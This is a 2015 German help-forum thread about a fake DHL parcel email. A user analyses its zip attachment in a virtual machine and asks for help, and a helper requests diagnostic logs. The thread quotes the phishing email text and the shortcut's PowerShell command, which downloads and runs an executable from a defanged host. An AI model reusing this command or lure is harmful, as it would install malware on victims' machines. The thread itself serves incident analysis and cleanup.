Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Gefälschte DHL-Email und (schädliche?) Infektion

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 14.10.2015, 23:20   #1
typsad
 
Gefälschte DHL-Email und (schädliche?) Infektion - Standard

Gefälschte DHL-Email und (schädliche?) Infektion



Hallo,

Ich melde mich hier vorsorglich.
Heute hat mein Vater eine Paketbestätigung erhalten, dass ein Paket abholbereit sein soll. Unachtsam wie mein Vater ist, hat er die Mail versucht zu öffnen. Da ihm das nicht gelungen ist, hat er sie an mich weitergeleitet.

Die Mail sieht wie folgt aus:

Betreff: "New paket!"

Text:
(DHL BANNER)
Code:
ATTFilter
 	

Guten Tag xxxx@xxxx.de,

Ihr Paket ID##### ist empfangsbereit.

Diese e-mail ist eine Mitteilung für die Ankunft.
Lieferung durch den Absender gezahlt.
Die Hohe der Versicherungspaket € ####.

Um das Sendung zu bekommen , bitte drucken Sie das angehangte Dokument und prasentieren sie in einem Lagerhaus.

 

Paket.de – Ihr Weg zum individuellen Paketempfang und -versand
DHL Paket GmbH
Sträßchensweg 10
53113 Bonn

Registergericht Bonn
HRB 19565
USt-IdNr.: DE 813312787

	Geschäftsführung:
Dr. Andrej Busch
Katja Herbst
Norman Chmiel
Heinrich Eilers
Dr. Thomas Ogilvie
Vorsitzender des Aufsichtsrates: Uwe Brinks 	Website
Kontakt
Impressum
Datenschutz


© 2015 DHL
         
(BANNER)

Die Datei habe Ich mal heruntergeladen und in einer VM geöffnet. Es ist eine zip-Datei, in der eine Verknüpfung zu einem .doc ist.
Die Verknüpfung ist manipuliert. Sie öffnet folgenden Befehl:

Code:
ATTFilter
(new-object System.Net.WebClient).DownloadFile('hxxp://supportsoft777.pw/bot.exe','%TEMP%\t.exe');Start-Process "%TEMP%\t.exe
         
Achtung: Die "xx" habe Ich eingesetzt, damit es nicht zu unabsichtlichen Öffnungen kommt.
Leider brachte mir das Nachforschen nichts, außer einem virustotal report (https://www.virustotal.com/de/user/mastertaco/).
Virustotal von der Datei, die da nachgeladen werden soll:
https://www.virustotal.com/de/file/43c91995ee9cb6319a66a21f2e6ff8b28d48bca5872ad2df97d84a653ad5e9a0/analysis/1444860978/

Ist jemandem etwas bekannt zu diesem Vorfall? Die Datei wird ja von kaum einem aktuellen Virenscanner erkannt. An den PC von meinem Vater kann Ich erst morgen ran, um ausführliche Logs zu erstellen.

Gruß

Alt 15.10.2015, 05:58   #2
schrauber
/// the machine
/// TB-Ausbilder
 

Gefälschte DHL-Email und (schädliche?) Infektion - Standard

Gefälschte DHL-Email und (schädliche?) Infektion



Die Files ändern sich sekündlich, also kann keiner genau sagen was die machen.

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

__________________

__________________

Alt 15.10.2015, 12:36   #3
typsad
 
Gefälschte DHL-Email und (schädliche?) Infektion - Standard

Gefälschte DHL-Email und (schädliche?) Infektion



Danke für die Antwort.
Also erstes Symptom scheint zu sein, dass "harmlose" Software nachgeladen wird. Der PC hatte jetzt einige Male "BCWipeTM" und "Acutal Multiple Monitors" versucht zu installieren.
Ich starte den PC mal neu und lege dann die Logs wie gewünscht an.
__________________

Alt 16.10.2015, 18:30   #4
schrauber
/// the machine
/// TB-Ausbilder
 

Gefälschte DHL-Email und (schädliche?) Infektion - Standard

Gefälschte DHL-Email und (schädliche?) Infektion



ok
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Antwort

Themen zu Gefälschte DHL-Email und (schädliche?) Infektion
absender, aktuelle, code, datei, dokument, e-mail, erhalte, folge, folgende, gefälschte, gen, hohe, infektion, mail, nichts, report, scan, scanner, sendung, soft, tiere, virenscan, virenscanner, virus, virustotal




Ähnliche Themen: Gefälschte DHL-Email und (schädliche?) Infektion


  1. Email Account gehackt: Email Versand an meine Kontakte mit meinem Namen, aber anderer Email Adresse.
    Log-Analyse und Auswertung - 29.07.2015 (3)
  2. E-Mails mit Fehlermeldung Email konnte nicht zugestellt werden im Spamordner + vorläufige Sperrung meines Email Accounts
    Plagegeister aller Art und deren Bekämpfung - 25.02.2015 (9)
  3. Gefälschte Telekom Email geöffnet
    Plagegeister aller Art und deren Bekämpfung - 28.11.2014 (7)
  4. Email von einer Bekannten erhalten mit fragwürdigem Link, sie hat jedoch keine Email verschickt.
    Plagegeister aller Art und deren Bekämpfung - 11.07.2014 (3)
  5. Trojaner in Email als zip heruntergeladen, enthaltene Datei aber nicht ausgeführt - Infektion?
    Plagegeister aller Art und deren Bekämpfung - 05.07.2014 (3)
  6. Email von abuse@telekom bezüglich eventueller zbot/zeus Infektion
    Log-Analyse und Auswertung - 07.06.2014 (21)
  7. Trojaner in Email als zip heruntergeladen, enthaltene Datei aber nicht ausgeführt - Infektion?
    Plagegeister aller Art und deren Bekämpfung - 06.06.2014 (4)
  8. Avast: Infektion blockiert , Infektion: URL:Mal (bei Ebay.de)
    Plagegeister aller Art und deren Bekämpfung - 21.05.2014 (3)
  9. Gefälschte Rechnung Betrugs Email ! Wer kann helfen :( RECHNUNGSSTELLE
    Plagegeister aller Art und deren Bekämpfung - 05.02.2014 (10)
  10. Gefälschte und Telekom-Email und Link unachtsam geöffnet - Trojaner o.ä. eingefangen?
    Log-Analyse und Auswertung - 30.01.2014 (21)
  11. Link in Email geklickt... getarnt als Telekom Email
    Plagegeister aller Art und deren Bekämpfung - 13.01.2014 (1)
  12. gefälschte Telekom Email geöffnet
    Plagegeister aller Art und deren Bekämpfung - 09.01.2014 (1)
  13. Email an meine Mutter unter meinem Namen von unbekannter Email Adresse
    Überwachung, Datenschutz und Spam - 01.11.2013 (1)
  14. Gefälschte Groupon Email mit Zip Datei geöffnet
    Plagegeister aller Art und deren Bekämpfung - 13.03.2013 (13)
  15. Email-Anhang (.zip Datei) geöffnet; Gefälschte Email über Mahngebühren
    Log-Analyse und Auswertung - 25.02.2013 (19)
  16. gefälschte email 1&1 GmbH mit Anhang als getarnt
    Plagegeister aller Art und deren Bekämpfung - 02.11.2012 (8)
  17. Gefälschte Email
    Plagegeister aller Art und deren Bekämpfung - 17.09.2008 (3)

Zum Thema Gefälschte DHL-Email und (schädliche?) Infektion - Hallo, Ich melde mich hier vorsorglich. Heute hat mein Vater eine Paketbestätigung erhalten, dass ein Paket abholbereit sein soll. Unachtsam wie mein Vater ist, hat er die Mail versucht zu - Gefälschte DHL-Email und (schädliche?) Infektion...
Archiv
Du betrachtest: Gefälschte DHL-Email und (schädliche?) Infektion auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.